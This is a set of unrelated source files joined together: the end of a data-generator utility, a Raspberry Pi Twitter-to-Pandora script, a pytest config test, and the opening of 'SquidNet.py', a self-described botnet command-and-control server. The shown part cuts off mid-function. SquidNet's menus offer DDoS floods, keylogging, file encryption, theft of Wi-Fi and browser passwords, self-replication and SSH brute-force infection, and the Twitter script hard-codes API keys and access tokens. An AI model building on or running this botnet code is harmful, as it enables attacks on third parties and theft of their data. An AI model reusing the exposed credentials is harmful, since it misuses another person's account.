"`use_multiprocessing=False, workers > 1`."
"For more information see issue #1638.")
six.reraise(*sys.exc_info())
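# Hedged usage sketch (illustrative, not part of the original module): wrap a
# plain Python generator with `GeneratorEnqueuer`. A single worker is used
# because this toy generator is not thread-safe; real code would yield
# (inputs, targets) batches.
if __name__ == "__main__":
    def toy_gen():
        i = 0
        while True:
            yield (i, i * 10)
            i += 1

    gen_q = GeneratorEnqueuer(toy_gen(), use_multiprocessing=False)
    gen_q.start(workers=1, max_queue_size=4)
    stream = gen_q.get()
    print([next(stream) for _ in range(3)])  # [(0, 0), (1, 10), (2, 20)]
    gen_q.stop()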
|
twitter+gui_backup_oct12.py
|
# Twitter + GUI
from Tkinter import *
from time import sleep
import os
import tweepy
import requests
import json
from pydora import player
from pandora import clientbuilder
import sys
import termios
import getpass
import subprocess
import time
#import for gui
import Tkinter
#import for processes using rabbitmq
import pika
from multiprocessing import Process, Manager
#Global Variable keys (I got these from the twitter app page)
#need to change them for other twitter accounts
'''
consumer_key = "3gI3AIYm8OkxfkU9Er81DZ4Kd"
consumer_secret = "drCThGHlqjHfF3QcFiEWBEnter Text Here1LjvsglEiHoiKQ5OeB1UiYCx7PyMl"
access_token = "2462366071-WHcsSVijoOa9tHWokK8ZNd1zQRJSseJPojGQGut"
access_token_secret = "gtbePKnCgIl6UpkrUGLks3o77WYgKoWeRnVKXOLIg2kQ4"
'''
consumer_key = "3gI3AIYm8OkxfkU9Er81DZ4Kd"
consumer_secret = "drCThGHlqjHfF3QcFiEWB1LjvsglEiHoiKQ5OeB1UiYCx7PyMl"
access_token = "2462366071-WHcsSVijoOa9tHWokK8ZNd1zQRJSseJPojGQGut"
access_token_secret = "gtbePKnCgIl6UpkrUGLks3o77WYgKoWeRnVKXOLIg2kQ4"
class simpleapp_tk(Tkinter.Tk):
def __init__(self, parent):
Tkinter.Tk.__init__(self, parent)
self.parent = parent
self.initialize()
def initialize(self):
self.grid()
self.entryVariable = Tkinter.StringVar()
self.entry = Tkinter.Entry(self, textvariable=self.entryVariable)
self.entry.grid(column=0, row=0, sticky='EW')
self.entry.bind("<Return>", self.OnPressEnter)
self.entryVariable.set(u"Enter Text Here")
button = Tkinter.Button(self, text=u"Click here",
command=self.OnButtonClick)
button.grid(column=1, row=0)
self.labelVariable = Tkinter.StringVar()
label = Tkinter.Label(self, textvariable=self.labelVariable,
anchor="nw", fg="white", bg="#335",
width=100, height=25,
justify='right',
cursor='gumby', font=("Times",20))
label.grid(column=0, row=1, columnspan=2, sticky='EW')
self.labelVariable.set(u"Hello")
self.grid_columnconfigure(0,weight=1)
self.resizable(True,True)
self.update()
self.geometry(self.geometry())
self.entry.focus_set()
self.entry.selection_range(0, Tkinter.END)
def OnButtonClick(self):
i = 0
lst = []
string = ''
station_list = open('/home/pi/Desktop/pydora-test/DICT_SAVE', 'r')
for station in station_list:
lst.append(station)
string = string + station
i = 0
#print (string)
self.labelVariable.set(string)
'''
for i in range (len(lst)):
print (lst[i])
self.labelVariable.set(lst[i])
'''
'''
self.labelVariable.set(self.entryVariable.get()+"You clicked the button!")
self.entry.focus_set()
self.entry.selection_range(0, Tkinter.END)
'''
def OnPressEnter(self, event):
self.labelVariable.set(self.entryVariable.get()+"You pressed enter")
self.entry.focus_set()
self.entry.selection_range(0, Tkinter.END)
def twitter():
def search(tweet):
print ("running")
client = get_client()
print("Connected")
search = (client.search(tweet,include_genre_stations=True))
print ("About to sort stations")
artists_score = 0
songs_score = 0
genre_score = 0
print(search)
if (len(search.artists) != 0):
artists_score = search.artists[0].score
artists_token = search.artists[0].token
artists_name = search.artists[0].artist
print("did artist search "+artists_name)
print("#1")
if (len(search.songs) != 0):
songs_score = search.songs[0].score
songs_token = search.songs[0].token
songs_name = search.songs[0].song_name
print("did song search " +songs_name)
print("#2")
if (len(search.genre_stations) != 0):
genre_score = search.genre_stations[0].score
genre_token = search.genre_stations[0].token
genre_name = search.genre_stations[0].station_name
print("did genre search "+genre_name)
print ("#3")
print("Done sorting")
if (artists_score > 80):
print("Returning artist: ", artists_name)
return artists_name
elif(genre_score > 80):
print("Returning genre: ", genre_name)
return genre_name
elif(songs_score > 80):
print("Retruning song: ", songs_name)
return songs_name
else:
print("Error: no station matches your request")
return ("error")
def get_client():
cfg_file = os.environ.get("PYDORA_CFG", "")
builder = clientbuilder.PydoraConfigFileBuilder(cfg_file)
if builder.file_exists:
return builder.build()
builder = clientbuilder.PianobarConfigFileBuilder()
if builder.file_exists:
return builder.build()
print("No valid config found")
sys.exit(1)
def save_stuff(name, time, body, station):
#We want to keep name, timestamp, tweet, and the returned station in a file
string = ('\nname: ' + name + '\ntime: ' + time + '\ntweet: ' + body + '\nstation: ' + station)
f = open('/home/pi/Desktop/pydora-test/SAVE_FILE', 'a')
f.write('\n' + string)
s = open('/home/pi/Desktop/pydora-test/STATION_SAVE', 'a')
s.write(station + '\n')
# Actual main routine. This is what runs when you execute the file
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
try:
redirect_url = auth.get_authorization_url()
except tweepy.TweepError:
print('Error! Failed to get request token.')
request_token = auth.request_token
class StdOutListener(tweepy.StreamListener):
def on_data(self,data):
tweet = json.loads(data)
#print (tweet)
#this has a lot of valuable information
temp = tweet['text'] #prints out contents of tweet
lst = temp.split('#') #gets rid of #hemmingson
print(lst)
body = lst[0]
print(body)
#gets the user that sent the tweet
user = tweet.get('user')
name = user['screen_name']
#gets the time the tweet was created.
#Printed in tweet to prevent duplicate tweet errors
time = tweet['created_at']
time = time[:-10]
'''
#Grabs an image from local device and posts it
image = os.path.abspath('/home/pi/Desktop/something.png')
#prints out the screen name
#api.update_status("@" + name + "\nRetweet Test\n" + time + "/n")
api.update_with_media(image, status="@" + name + "\nRetweet Test\n" + time + "/n")
'''
station = search(body)
print ("Recieved the station")
print (station)
if station != ('error'):
save_stuff(name, time, body, station)
def on_error(self, status):
print (status)
l = StdOutListener()
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
print "Scanning for Hemmingson Playlist Requests"
stream = tweepy.Stream(auth, l)
stream.filter(track=['hemmingson'])
while(stream.running):
#time.sleep(0)
pass
def gui():
app = simpleapp_tk(None)
app.title('Test Stuff')
app.mainloop()
def sort():
SAVE_BUFFER = {}
def dict_to_string(dictionary):
total_string = ''
for key in dictionary:
string = key + " - - - - - - - - - - - - - - - - - - - - -"
string = string[:30]
count = str(dictionary[key])
total_string = total_string + string + count + '\n'
return total_string
def __init__():
if len(SAVE_BUFFER) == 0:
station_list = open('/home/pi/Desktop/pydora-test/STATION_SAVE', 'r')
for station in station_list:
#print (station)
temp = station[:len(station)-1]
if temp != '':
if temp in SAVE_BUFFER.keys():
SAVE_BUFFER[temp] = SAVE_BUFFER[temp] + 1
else:
SAVE_BUFFER[temp] = 1
while True:
__init__()
dictionary = open('/home/pi/Desktop/pydora-test/DICT_SAVE', 'w')
string = dict_to_string(SAVE_BUFFER)
#print (string)
dictionary.write(string)
time.sleep(2)
'''
while (True):
station_list = open('STATION_SAVE', 'r')
for station in station_list:
print station
time.sleep(20)
'''
def twitter_process():
twitter()
if (__name__ == "__main__"):
p = Process(target=twitter_process, args=())
q = Process(target=gui, args=())
r = Process(target=sort, args=())
p.start()
q.start()
r.start()
p.join()
q.join()
r.join()
|
test_config.py
|
import asyncio
import copy
import pytest
import random
import yaml
from taco.util.config import create_default_taco_config, initial_config_file, load_config, save_config
from taco.util.path import mkdir
from multiprocessing import Pool
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Dict
# Commented-out lines are preserved to aid in debugging the multiprocessing tests
# import logging
# import os
# import threading
# log = logging.getLogger(__name__)
def write_config(root_path: Path, config: Dict):
"""
Wait for a random amount of time and write out the config data. With a large
config, we expect save_config() to require multiple writes.
"""
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] write_config")
# save_config(root_path=root_path, filename="config.yaml", config_data=modified_config)
save_config(root_path=root_path, filename="config.yaml", config_data=config)
def read_and_compare_config(root_path: Path, default_config: Dict):
"""
Wait for a random amount of time, read the config and compare with the
default config data. If the config file is partially written or corrupt,
load_config should fail or return bad data.
"""
# Wait a moment. The read and write threads are delayed by a random amount
# in an attempt to interleave their execution.
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] read_and_compare_config")
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert len(config) > 0
# if config != default_config:
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] bad config: {config}")
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] default config: {default_config}")
assert config == default_config
async def create_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Spin off reader and writer threads and wait for completion
"""
thread1 = Thread(target=write_config, kwargs={"root_path": root_path, "config": default_config})
thread2 = Thread(target=read_and_compare_config, kwargs={"root_path": root_path, "default_config": default_config})
thread1.start()
thread2.start()
thread1.join()
thread2.join()
def run_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Subprocess entry point. This function spins off threads to perform read/write tasks
concurrently, possibly leading to synchronization issues accessing config data.
"""
asyncio.get_event_loop().run_until_complete(create_reader_and_writer_tasks(root_path, default_config))
class TestConfig:
@pytest.fixture(scope="function")
def root_path_populated_with_config(self, tmpdir) -> Path:
"""
Create a temp directory and populate it with a default config.yaml.
Returns the root path containing the config.
"""
root_path: Path = Path(tmpdir)
create_default_taco_config(root_path)
return Path(root_path)
@pytest.fixture(scope="function")
def default_config_dict(self) -> Dict:
"""
Returns a dictionary containing the default config.yaml contents
"""
content: str = initial_config_file("config.yaml")
config: Dict = yaml.safe_load(content)
return config
def test_create_config_new(self, tmpdir):
"""
Test create_default_taco_config() as in a first run scenario
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
# Expect: config.yaml doesn't exist
assert config_file_path.exists() is False
# When: creating a new config
create_default_taco_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are seeded with initial contents
assert actual_content == expected_content
def test_create_config_overwrite(self, tmpdir):
"""
Test create_default_taco_config() when overwriting an existing config.yaml
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
mkdir(config_file_path.parent)
# When: config.yaml already exists with content
with open(config_file_path, "w") as f:
f.write("Some config content")
# Expect: config.yaml exists
assert config_file_path.exists() is True
# When: creating a new config
create_default_taco_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are overwritten with initial contents
assert actual_content == expected_content
def test_load_config(self, root_path_populated_with_config, default_config_dict):
"""
Call load_config() with a default config and verify a few values are set to the expected values
"""
root_path: Path = root_path_populated_with_config
# When: loading a newly created config
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert config is not None
# Expect: config values should match the defaults (from a small sampling)
assert config["daemon_port"] == default_config_dict["daemon_port"] == 55400
assert config["self_hostname"] == default_config_dict["self_hostname"] == "localhost"
assert (
config["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== default_config_dict["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== "ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb"
)
def test_load_config_exit_on_error(self, tmpdir):
"""
Call load_config() with an invalid path. Behavior should be dependent on the exit_on_error flag.
"""
root_path: Path = tmpdir
config_file_path: Path = root_path / "config" / "config.yaml"
# When: config file path points to a directory
mkdir(config_file_path)
# When: exit_on_error is True
# Expect: load_config will exit
with pytest.raises(SystemExit):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=True)
# When: exit_on_error is False
# Expect: load_config will raise an exception
with pytest.raises(ValueError):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=False)
def test_save_config(self, root_path_populated_with_config, default_config_dict):
"""
Test modifying the config and saving it to disk. The modified value(s) should be present after
calling load_config().
"""
root_path: Path = root_path_populated_with_config
config: Dict = copy.deepcopy(default_config_dict)
# When: modifying the config
config["harvester"]["farmer_peer"]["host"] = "oldmacdonald.eie.io"
# Sanity check that we didn't modify the default config
assert config["harvester"]["farmer_peer"]["host"] != default_config_dict["harvester"]["farmer_peer"]["host"]
# When: saving the modified config
save_config(root_path=root_path, filename="config.yaml", config_data=config)
# Expect: modifications should be preserved in the config read from disk
loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
assert loaded["harvester"]["farmer_peer"]["host"] == "oldmacdonald.eie.io"
def test_multiple_writers(self, root_path_populated_with_config, default_config_dict):
"""
Test whether multiple readers/writers encounter data corruption. When using non-atomic operations
to write to the config, partial/incomplete writes can cause readers to yield bad/corrupt data.
Access to config.yaml isn't currently synchronized, so the best we can hope for is that
the file contents are written as a whole.
"""
# Artificially inflate the size of the default config. This is done to (hopefully) force
# save_config() to require multiple writes. When save_config() was using shutil.move()
# multiple writes were observed, leading to read failures when data was partially written.
default_config_dict["xyz"] = "x" * 32768
root_path: Path = root_path_populated_with_config
save_config(root_path=root_path, filename="config.yaml", config_data=default_config_dict)
num_workers: int = 30
args = list(map(lambda _: (root_path, default_config_dict), range(num_workers)))
# Spin-off several processes (not threads) to read and write config data. If any
# read failures are detected, the failing process will assert.
with Pool(processes=num_workers) as pool:
res = pool.starmap_async(run_reader_and_writer_tasks, args)
res.get(timeout=10)
|
SquidNet.py
|
import random, socket, time, sys, threading, random, os, hashlib, datetime, sqlite3
try:
"""This Module comes with Paramiko."""
from cryptography.fernet import Fernet
except:
pass
from optparse import OptionParser
"""This script is NOT Perfected(Still a WIP)! Notify me if there are any
issues with the script! I am open for DMs but please state that are a user
of my scripts, otherwise I will ignore you(I don't accept DMs from
strangers). My Discord: DrSquid™#7711. If you are unable to reach me,
you can open a discussion and I will respond to that in my repository."""
class ArguementParse:
"""Main Class for parsing command prompt arguements
when running the scripts."""
def __init__(self):
"""All arguements are optional! The botnet will start up without
arguements, however it will only be hosted on localhost.
The arguement parsing function will be utilized here."""
self.get_args()
def downloadNgrok(self):
"""Downloads Ngrok for windows. May need to add it for other OS's
but maybe in the future I will."""
print("[+] Downloading Ngrok.....\n")
if sys.platform == "win32":
batfile = open("getNgrok.bat", "w")
batfile.write(f"""
curl https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -o ngrok.zip
tar -xf {os.getcwd()}/ngrok.zip
""")
batfile.close()
os.startfile(batfile.name)
else:
output = os.popen("curl https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -o ngrok.zip")
print("[+] Downloading Ngrok.....")
print("[+] Ngrok zip file has been downloaded. Unzip it to extract ngrok!\n")
print("[+] Sign in with an ngrok account and you are good to go.")
print("[+] Run 'ngrok tcp 80' to start an Ngrok domain after finishing.")
sys.exit()
def usage(self):
"""Displays help for arguement parsing(good for first time users).
Allows the user to know what the arguements do as well as well as
how to use them."""
print(Botnet.log_logo(None))
print("""
[+] Option-Parsing Help:
[+] --ip, --ipaddr - Specifies the IP to host the Botnet on.
[+] --p, --port - Specifies the Port to host the Botnet on.
[+] --aU, --adminuser - Specify Botnet Admin Username.
[+] --aP, --adminpass - Specify Botnet Admin Password.
[+] --pL, --passlist - Specify a TXT File for SSH Brute-Forcing.
[+] Optional Arguements:
[+] --i, --info - Shows this message.
[+] --gN, --getngrok - Downloads Ngrok.
[+] --eK, --encryptkey - Specify encrypting key for bots.
[+] --eH, --externalhost - Specify an External Hostname for external connections.
[+] --eP, --externalport - Specify an External Port for external connections.
[+] Note: You need to have an Ngrok domain started for the ngrok arguements to have effect.
[+] Usage:""")
if sys.argv[0].endswith(".py"):
print("""[+] python3 Squidnet.py --ip <ip> --p <port> --aU <adminuser> --aP <adminpass> --eK <encryptkey> --pL <passlist> --nH <ngrokhost> --nP <ngrokport>
[+] python3 Squidnet.py --i
[+] python3 Squidnet.py --gN""")
else:
print("""[+] Squidnet --ip <ip> --p <port> --aU <adminuser> --aP <adminpass> --eK <encryptkey> --pL <passlist> --nH <ngrokhost> --nP <ngrokport>
[+] Squidnet --i
[+] Squidnet --gN""")
sys.exit()
def get_args(self):
"""Arguement Parsing function for initiating the Botnet. Also adds
a bit of info for configuring settings in the Botnet to function the
best way that it can."""
opt = OptionParser()
opt.add_option("--ip", "--ipaddr", dest="ip")
opt.add_option("--p", "--port", dest="port")
opt.add_option("--aU", "--adminuser", dest="adminuser")
opt.add_option("--aP", "--adminpass", dest="adminpass")
opt.add_option("--eK", "--encryptkey", dest="key")
opt.add_option("--pL", "--passlist", dest="passfile")
opt.add_option("--eH", "--externalhost", dest="ngrokhost")
opt.add_option("--eP", "--externalport", dest="ngrokport")
opt.add_option("--gN", "--getngrok", dest="download", action="store_true")
opt.add_option("--i", "--info", dest="info", action="store_true")
arg, opti = opt.parse_args()
if arg.download is not None:
print(Botnet.log_logo(None))
self.downloadNgrok()
if arg.info is not None:
self.usage()
else:
pass
if arg.ip is None:
ip = "localhost"
else:
ip = arg.ip
if arg.port is None:
port = 80
else:
try:
port = int(arg.port)
if port == 8080:
port = 80
except:
Botnet.logo(None)
print("[+] Invalid port provided! Must be an integer!")
sys.exit()
if arg.adminuser is None:
adminuser = "admin"
else:
adminuser = arg.adminuser
if arg.adminpass is None:
adminpass = str(random.randint(0, 99999999999999999999999999999))
else:
adminpass = arg.adminpass
if arg.key is None:
try:
key = Fernet.generate_key()
except:
key = b'QAYEFKLQT469LdHWIs4ZG7xKrDr8JRzMTwNFvoQFILg='
else:
key = str(arg.key).encode()
if arg.passfile is None:
passfile = False
else:
passfile = arg.passfile
if arg.ngrokhost is not None:
ngrokhost = arg.ngrokhost
else:
ngrokhost = None
if arg.ngrokport is not None:
try:
ngrokport = int(arg.ngrokport)
except:
print(Botnet.log_logo(None))
print("[+] Invalid port provided! Must be an integer!")
sys.exit()
else:
ngrokport = None
self.webinterface = Web_Interface("localhost", 8080)
self.botnet = Botnet(ip, port, adminuser, adminpass, key, passfile, ngrokhost, ngrokport)
class Botnet:
"""Main Class Made for the BotNet. Everything important
and needed for the Botnet is located in this class."""
class NotSamePassException(Exception):
def __init__(self, msg=f"Configured Password is the the same as one in server txt file!"):
"""Little Error for the password configuration."""
self.msg = msg
super().__init__(self.msg)
def __init__(self, ip, port, name, passw, key, passwfile, ngroklink=None, ngrokport=None):
"""Initiation of the main script. Definition of socket server, ngrok hosts, logging, etc
are created. There are also definition of variables that are vital to the overall script
that are defined here as well. Logging is also started."""
self.ip = ip
self.port = int(port)
self.name = name
self.passw = passw
self.key = key
self.info = []
self.ssh_info = []
self.admininfo = []
self.bot_count = 0
self.passfilename = passwfile
self.logfile = "servlog.txt"
self.passfile = passwfile
self.log("\n" + self.log_logo() + "\n")
self.log("\n[(SERVER)]: Starting up server....")
if self.passfile != False:
try:
self.passwords = open(passwfile, 'r')
except:
self.logo()
print(f"[+] File '{passwfile}' is not in current directory.\n[+] Server is closing.....")
self.log("\n[(ERROR)]: Error starting up server - Brute-forcing file is not in directory!\n[(CLOSE)]: Server is closing.....")
sys.exit()
self.version = "8.0"
self.connportlist = []
self.conn_list = []
self.admin_conn = []
self.ips = []
self.ssh_bots = []
self.ssh_botlist = []
self.display_bots = []
self.admin_name = ""
self.admin_password = ""
self.savefile = False
self.botfile = ""
self.instruction = ""
try:
self.ngroklink = ngroklink
self.ngrokport = int(ngrokport)
tester = socket.gethostbyname(self.ngroklink)
except:
self.ngroklink = self.ip
self.ngrokport = self.port
self.listenforconn = True
self.botscript = self.bot_script()
self.working = False
self.obtaininghistory = False
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.serv.bind((ip, port))
self.working = True
except Exception as e:
self.working = False
self.logo()
print("[+] The Server cannot be started! Check the logs for more info.")
self.log(f"\n[(ERROR)]: Unable to bind IP and Port due to: {e}")
sys.exit()
if self.working:
self.cwd = os.getcwd()
self.listener = threading.Thread(target=self.listen)
self.listener.start()
self.logo()
self.savefile = False
self.displaykeys = False
self.welcomemsg = """
[(SERVER)]:
[+] List of Commands:
[+] !help - Displays this message.
[+] !getconninfo - Displays info about all of the connections.
[+] Commands for TCP Botnet:
[+] !httpflood [website] [delay] - Denial Of Services the website provided.
[+] !tcpflood [ip] [port] [delay] [size] - Floods the target with TCP Packets.
[+] !udpflood [ip] [port] [delay] [size] - Floods the target with UDP Packets.
[+] !openfile [filename] - Opens a file in the bot working directory.
[+] !changedir [dir] - Changes the working directory of the Bot.
[+] !rmdir [folder] - Removes a folder in the bot working directory.
[+] !rmfile [file] - Removes a file in the bot working directory.
[+] !encfile [file] - Encrypts a provided file in the bot working directory
[+] !decfile [file] - Decrypts a provided file in the bot working directory
[+] !viewfilecontent [file] - Gets the content of the files provided.
[+] !dwnldfile [src] [file] - Downloads a file from the internet onto the bot computer.
[+] !mkdir [dir] - Makes a folder in the bot current directory.
[+] !gotowebsite [url] - Takes the bot to the provided website.
[+] !mkfile [filename] - Creates a file in the bot working directory.
[+] !editfile [file] - Opens a file in writing mode for the bots.
[+] !stopedit - Closes file editor on bots and returns to normal.
[+] !keylog [display?] - Sets up keylogging on the bots(put True in 2nd arg to display it, put nothing to not).
[+] !stopkeylog - Stops any keylogging on the Botnet.
[+] !encdir - Encrypts all files in the bot working directory
[+] !decdir - Decrypts all files in the bot working directory
[+] !botcount - Gets the amount of connected bots.
[+] !stopatk - Stops any ongoing DDoS Attacks in the Botnet.
[+] !changedirdesktop - Sets the bot working directory to their Desktop.
[+] !listdir - Lists the files in the bot working directories.
[+] !resettoken - Resets the token and changes it to a new token
[+] !getinfo - Gets the OS, cwd, IP, and username of the bots.
[+] !getip - Gets the IP of the bots
[+] !getwifi - Obtains the wifi names and passwords of the bots(Windows only).
[+] !savefile - Obtains a file from the bots directory.
[+] !getcwd - Gets the bots working directory.
[+] !getos - Gets the OS Of the bots.
[+] !getpasswords - Gets the stored browser passwords of the bots(Windows only).
[+] !rickroll - Rick Rolls the Bots.
[+] !getchromehistory - Obtains the chrome history of the bots(it needs to already be in the server txt file).
[+] !cloneself - Self replicates the Bot scripts in the bots.
[+] Commands for SSH Botnet:
[+] !infect [ip] [user] - Brute forces login for provided ip and username.
[+] !sshlogin [ip] [user] [pass] - Logs in the ip with the provided username and password.
[+] !listsshbots - Lists all SSH Bots.
[+] Any other commands will be made into cmd commands.
"""
item = f"\n[(SERVER)]: Server started: {datetime.datetime.today()}\n[(SERVER)]: Successfully started server on: {self.ngroklink}:{self.ngrokport}\n[(SERVER)]: Listening for connections.....\n[(SERVER)]: Encryption key used: {self.key}"
self.log(item)
print(f"\n[+] Hosting Server at {self.ngroklink}:{self.ngrokport}")
print("[+] Web-Interface For More Info: http://127.0.0.1:8080")
print("[+] Botnet is Up! Listening for connections.....\n")
print(f"[+] This Server is being logged!\n[+] Server Log File: {self.logfile}")
print(f"\n[+] Use this token when encrypting!: {key}")
print("[+] Notice that this token will be used if encrypting files(probably save it).")
self.usage()
self.instructor = threading.Thread(target=self.instruct)
self.instructor.start()
def log_logo(self=None):
"""Logo of this script."""
logo = """
_____ _ _ _ _ _ ___ ___
/ ____| (_) | | \ | | | | / _ \ / _ \
| (___ __ _ _ _ _ __| | \| | ___| |_ __ _| (_) | | | |
\___ \ / _` | | | | |/ _` | . ` |/ _ \ __| \ \ / /> _ <| | | |
____) | (_| | |_| | | (_| | |\ | __/ |_ \ V /| (_) | |_| |
|_____/ \__, |\__,_|_|\__,_|_| \_|\___|\__| \_/ \___(_)___/
| |
|_|
TCP and SSH Botnet Hybrid Command and Control Server By DrSquid"""
return logo
def logo(self):
"""Prints the logo of this script."""
print(self.log_logo())
def usage(self):
"""This displays the list of commands on the server that can be sent to the bots."""
print("\n[+] Commands:\n")
print("[+] !help - Displays all of the commands.")
print("[+] !whatsnew - Displays all new features.")
print("[+] !getconninfo - Displays info about all of the connections.")
print(
"[+] !genadminscript - Generates the admin script for remote connections to this server.")
print(
"[+] !genscript - Generates the bot python script needed to connect to this server.")
print("[+] !clear - Clears the output.")
print(
"[+] !togglelisten - Toggles whether to stop accepting connections or start accepting them.")
print("[+] !kick [hostname] [srcport] - Kicks a client off of the Botnet.")
print("\n[+] Commands for TCP Botnet:\n")
print("[+] !httpflood [website] [delay] - Denial Of Services the website provided.")
print("[+] !tcpflood [ip] [port] [delay] [size] - Floods the target with TCP Packets.")
print("[+] !udpflood [ip] [port] [delay] [size] - Floods the target with UDP Packets.")
print("[+] !openfile [filename] - Opens a file in the bot working directory.")
print("[+] !changedir [dir] - Changes the working directory of the Bot.")
print("[+] !rmdir [folder] - Removes a folder in the bot working directory.")
print("[+] !rmfile [file] - Removes a file in the bot working directory.")
print("[+] !encfile [file] - Encrypts a provided file in the bot working directory")
print("[+] !decfile [file] - Decrypts a provided file in the bot working directory")
print("[+] !viewfilecontent [file] - Gets the content of the files provided.")
print("[+] !dwnldfile [src] [file] - Downloads a file from the internet onto the bot computer.")
print("[+] !mkdir [dir] - Makes a folder in the bot current directory.")
print("[+] !gotowebsite [url] - Takes the bot to the provided website.")
print("[+] !mkfile [filename] - Creates a file in the bot working directory.")
print("[+] !editfile [file] - Opens a file in writing mode for the bots.")
print("[+] !stopedit - Closes file editor on bots and returns to normal.")
print(
"[+] !keylog [display?] - Sets up keylogging on the bots(put True in 2nd arg to display it, put nothing to not).")
print("[+] !stopkeylog - Stops any keylogging on the Botnet.")
print("[+] !encdir - Encrypts all files in the bot working directory")
print("[+] !decdir - Decrypts all files in the bot working directory")
print("[+] !botcount - Gets the amount of connected bots.")
print("[+] !stopatk - Stops any ongoing DDoS Attacks in the Botnet.")
print("[+] !changedirdesktop - Sets the bot working directory to their Desktop.")
print("[+] !listdir - Lists the files in the bot working directories.")
print("[+] !resettoken - Resets the token and changes it to a new token")
print("[+] !getinfo - Gets the OS, cwd, IP, and username of the bots.")
print("[+] !getip - Gets the IP of the bots")
print(
"[+] !getwifi - Obtains the wifi names and passwords of the bots(Windows only).")
print("[+] !savefile - Obtains a file from the bots directory.")
print("[+] !getcwd - Gets the bots working directory.")
print("[+] !getos - Gets the OS Of the bots.")
print("[+] !getpasswords - Gets the stored browser passwords of the bots(Windows only).")
print("[+] !rickroll - Rick Rolls the Bots.")
print("[+] !cloneself - Self replicates the Bot scripts in the bots.")
print(
"[+] !getchromehistory - Check the bots chrome history(Hehehe....)(it will save in an external file).")
print("\n[+] Commands for SSH Botnet:\n")
print("[+] !infect [ip] [user] - Brute forces login for the provided ip and username.")
print("[+] !inject [file] - Opens FTP and injects a file into an infected host.")
print("[+] !sshlogin [ip] [user] [pass] - Logs in the ip with the provided username and password.")
print("[+] !listsshbots - Lists all SSH Bots.")
print("\n[+] Any other commands will be made into cmd commands.\n")
def listen(self):
"""This function listens for connections from admins and bots alike.
The first message received will be interpreted as the name of the device
and it will be displayed for the Admins to see. A thread is created for the
handling of the connection. If variable 'self.listenforconn' is False, then
the server will not listen for connections."""
while True:
try:
if self.listenforconn:
flag = 0
self.serv.listen(1)
c, ip = self.serv.accept()
if not self.listenforconn:
c.close()
else:
msg = c.recv(1024).decode().strip()
self.bot_count += 1
split_msg = msg.split()
hostname = split_msg[0]
try:
ipaddr = str(split_msg[1])
except:
ipaddr = "Unknown"
try:
user = str(split_msg[2])
except:
user = "Unknown"
try:
connection = str(ip[1])
except:
connection = "Unknown"
try:
opsys = split_msg[3]
except:
opsys = "Unknown"
self.connportlist.append(hostname + " " + str(ip[1]) + " " + str(c))
self.log(f"""
[({hostname})---->(SERVER)]:
[+] HOSTNAME: {hostname}
[+] IPADDR : {ipaddr}
[+] USERNAME: {user}
[+] CONN : {connection}
[+] OS : {opsys}""")
info = str(hostname + " " + ipaddr + " " + user + " " + connection + " " + opsys)
self.info.append(info)
print(f"\n[!] {hostname} has connected to the botnet.")
self.log(f"\n[(CONNECTION)]: {hostname} has connected to the botnet.")
handle = threading.Thread(target=self.handler, args=(c, hostname, self.bot_count, info))
handle.start()
else:
pass
except Exception as e:
self.log(f"\n[(ERROR)]: {str(e)}")
def log(self, msg):
"""Logs server output."""
try:
self.serverlog = open(self.logfile, 'r')
contents = self.serverlog.read()
self.serverlog.close()
self.serverlog = open(self.logfile, 'w')
self.serverlog.write(contents)
self.serverlog.write(msg)
self.serverlog.close()
except FileNotFoundError:
self.serverlog = open(self.logfile, "w")
self.serverlog.write(msg)
self.serverlog.close()
except:
self.serverlog = open(self.logfile, 'rb')
contents = self.serverlog.read()
self.serverlog.close()
self.serverlog = open(self.logfile, 'wb')
self.serverlog.write(contents)
self.serverlog.write(msg)
self.serverlog.close()
def wrap_item(self, word, size):
"""Wraps the items from the conn-list and aligns it in the table."""
item = word
while len(item) + 2 <= size - 1:
item += " "
return item
def gen_conntable(self):
"""Generates the connection table with info about each connection.
This is similar to the information displayed in the Web-Interface."""
result = """
Regular Connections:
______________________________________________________________________________________
| | | | | |
| Hostname | IP Address | Username | Connection | OS |
|_______________________|__________________|______________|______________|___________|"""
for info in self.info:
split_info = info.split()
result += f"\n| {self.wrap_item(split_info[0], 24)}| {self.wrap_item(split_info[1], 19)}| {self.wrap_item(split_info[2], 15)}| {self.wrap_item(split_info[3], 15)}| {self.wrap_item(split_info[4], 12)}|"
result += "\n|_______________________|__________________|______________|______________|___________|"
result += """
Admin Connections:
______________________________________________________________________________________
| | | | | |
| Hostname | IP Address | Username | Connection | OS |
|_______________________|__________________|______________|______________|___________|"""
for info in self.admininfo:
